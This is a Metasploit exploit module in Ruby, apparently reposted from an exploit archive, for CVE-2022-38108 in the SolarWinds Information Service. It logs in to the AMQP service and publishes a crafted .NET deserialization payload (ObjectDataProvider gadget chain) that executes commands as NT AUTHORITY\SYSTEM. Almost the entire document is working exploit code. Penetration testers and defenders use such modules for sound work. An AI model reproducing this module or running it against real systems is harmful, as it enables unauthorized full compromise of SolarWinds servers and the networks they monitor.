SolarWinds Information Service (SWIS) Remote Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'rex/proto/amqp/version_0_9_1'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
def initialize  
super(  
'Name' => 'SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE',  
'Description' => %q{  
The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the  
AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted  
message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.  
},  
'Author' => [  
'Justin Hong', # vulnerability research, Trend Micro  
'Lucas Miller', # vulnerability research, Trend Micro  
'Piotr Bazydło', # vulnerability discovery, reported to ZDI  
'Spencer McIntyre' # metasploit module  
],  
'Arch' => ARCH_CMD,  
'Platform' => 'win',  
'References' => [  
[ 'CVE', '2022-38108' ],  
[ 'URL', 'https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor' ],  
[ 'URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108' ]  
],  
'DefaultOptions' => {  
'WfsDelay' => 10  
},  
'Targets' => [  
[ 'Automatic', {} ]  
],  
'DefaultTarget' => 0,  
'Privileged' => true,  
'DisclosureDate' => '2022-10-19',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
  
register_options([  
Opt::RHOST,  
Opt::RPORT(5671),  
OptString.new('USERNAME', [true, 'The username to authenticate with', 'orion']),  
OptString.new('PASSWORD', [true, 'The password to authenticate with', ''])  
])  
  
register_advanced_options(  
[  
OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),  
Opt::SSLVersion  
]  
)  
end  
  
def peer  
rhost = datastore['RHOST']  
rport = datastore['RPORT']  
if Rex::Socket.is_ipv6?(rhost)  
"[#{rhost}]:#{rport}"  
else  
"#{rhost}:#{rport}"  
end  
end  
  
def print_status(msg)  
msg = "#{peer} - #{msg}"  
super  
end  
  
def exploit  
amqp_client = Rex::Proto::Amqp::Version091::Client.new(  
datastore['RHOST'],  
port: datastore['RPORT'],  
context: { 'Msf' => framework, 'MsfExploit' => self },  
ssl: datastore['SSL'],  
ssl_version: datastore['SSLVersion']  
)  
  
unless amqp_client.login(datastore['USERNAME'], datastore['PASSWORD'])  
fail_with(Failure::NoAccess, "Authentication failed for user #{datastore['USERNAME']}.")  
end  
print_status('Successfully connected to the remote server.')  
  
channel = amqp_client.channel_open  
vprint_status('Successfully opened a new channel.')  
channel.basic_publish(  
routing_key: 'SwisPubSub',  
message: ::Msf::Util::DotNetDeserialization.generate(  
payload.encoded,  
gadget_chain: :ObjectDataProvider,  
formatter: :JsonNetFormatter  
),  
properties: {  
message_type: 'System.Windows.Data.ObjectDataProvider'  
}  
)  
print_status('Successfully published the message to the channel.')  
  
channel.close  
amqp_client.connection_close  
rescue Rex::Proto::Amqp::Error::UnexpectedReplyError => e  
fail_with(Failure::UnexpectedReply, e.message)  
rescue Rex::Proto::Amqp::Error::AmqpError => e  
fail_with(Failure::Unknown, e.message)  
ensure  
amqp_client.close  
end  
end  
`